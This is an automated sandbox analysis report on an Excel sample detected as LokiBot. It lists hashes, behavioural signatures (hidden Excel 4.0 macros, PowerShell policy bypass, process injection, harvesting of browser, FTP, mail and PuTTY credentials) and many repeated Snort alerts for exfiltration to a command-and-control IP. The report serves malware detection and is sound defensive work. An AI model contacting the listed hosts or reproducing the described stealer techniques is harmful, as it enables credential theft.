Analysis Report 6Cprm97UTl

Overview

General Information

Sample Name: 6Cprm97UTl (renamed file extension from none to xls)
Analysis ID: 336301
MD5: 29c8b5edc30eadf757b72b0a14857903
SHA1: 77d432fb96a0a453bae30107990c2c9ee0314330
SHA256: a174abce368b775138c203d66fa8a3845aead2d53d87f220c58a2fe8ee7d9cf0

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Lokibot
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection:

barindex
Machine Learning detection for dropped file
Source: C:\Users\user\Documents\12.exe Joe Sandbox ML: detected
Source: C:\Users\user\ntrwe.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 17_2_00403D74
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 4x nop then mov esp, ebp 11_2_0031E458
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 11_2_0031F138
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 11_2_0031CE50
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 4x nop then jmp 00318CF3h 11_2_00318240
Source: C:\Users\user\ntrwe.exe Code function: 4x nop then jmp 00508CF3h 15_2_00508520
Source: C:\Users\user\ntrwe.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 15_2_0050CE50
Source: C:\Users\user\ntrwe.exe Code function: 4x nop then mov esp, ebp 18_2_0040E132
Source: C:\Users\user\ntrwe.exe Code function: 4x nop then jmp 00408CF3h 18_2_00408515
Source: C:\Users\user\ntrwe.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 18_2_0040CE50
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cutt.ly
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 104.22.0.232:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 104.22.0.232:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.22:49167 -> 83.172.144.37:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49168 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49168 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49169 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49169 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49169 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49169 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49170 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49170 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49170 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49170 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49170
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49171 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49171 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49171 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49171 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49171
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49172 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49172 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49172 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49172 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49172
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49173 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49173 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49173 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49173 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49173
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49174 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49174 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49174 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49174 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49174
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49175 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49175 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49175 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49175 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49175
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49176 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49176 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49176 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49176 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49176
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49177 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49177 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49177 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49177 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49177
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49178 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49178 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49178 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49178 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49178
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49179 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49179 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49179 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49179 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49179
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49180 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49180 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49180 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49180 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49180
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49181 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49181 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49181 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49181 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49181
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49182 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49182 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49182 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49182 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49182
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49183 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49183 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49183 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49183 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49183
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49184 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49184 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49184 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49184 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49184
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49185 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49185 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49185 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49185 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49185
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49186 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49186 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49186 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49186 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49186
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49187 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49187 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49187 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49187 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49187
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49188 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49188 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49188 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49188 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49188
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49189 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49189 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49189 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49189 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49189
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49190 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49190 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49190 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49190 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49190
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49191 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49191 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49191 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49191 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49191
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49192 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49192 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49192 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49192 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49192
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49193 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49193 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49193 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49193 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49193
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49194 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49194 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49194 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49194 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49194
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49195 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49195 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49195 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49195 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49195
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49196 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49196 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49196 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49196 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49196
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49197 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49197 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49197 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49197 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49197
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49198 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49198 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49198 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49198 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49198
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49199 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49199 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49199 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49199 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49199
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49200 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49200 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49200 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49200 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49200
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49201 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49201 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49201 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49201 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49201
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49202 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49202 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49202 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49202 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49202
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49203 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49203 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49203 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49203 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49203
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49204 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49204 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49204 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49204 -> 185.206.215.56:80
